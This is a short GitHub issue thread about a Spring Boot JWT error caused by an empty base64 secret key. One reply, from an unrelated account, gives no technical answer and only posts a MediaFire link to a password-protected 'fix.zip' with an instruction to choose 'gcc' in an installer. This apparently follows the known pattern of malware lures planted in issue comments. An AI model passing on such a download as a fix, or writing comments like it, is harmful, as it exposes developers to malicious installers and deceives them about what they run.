### ISSUE TITLE
token secret_key error 발생

### ISSUE THREAD

**Issue by yjeongyjeong** [yjeongyjeong/springboot-developer#3]
```
java.lang.IllegalArgumentException: base64-encoded secret key cannot be null or empty.
```
에러가 발생하고 토큰 생성과 관련된 테스트가 실행되지 않음

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yjeongyjeong** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

oh, I'm not sure that, but I solved the issue. Thank you
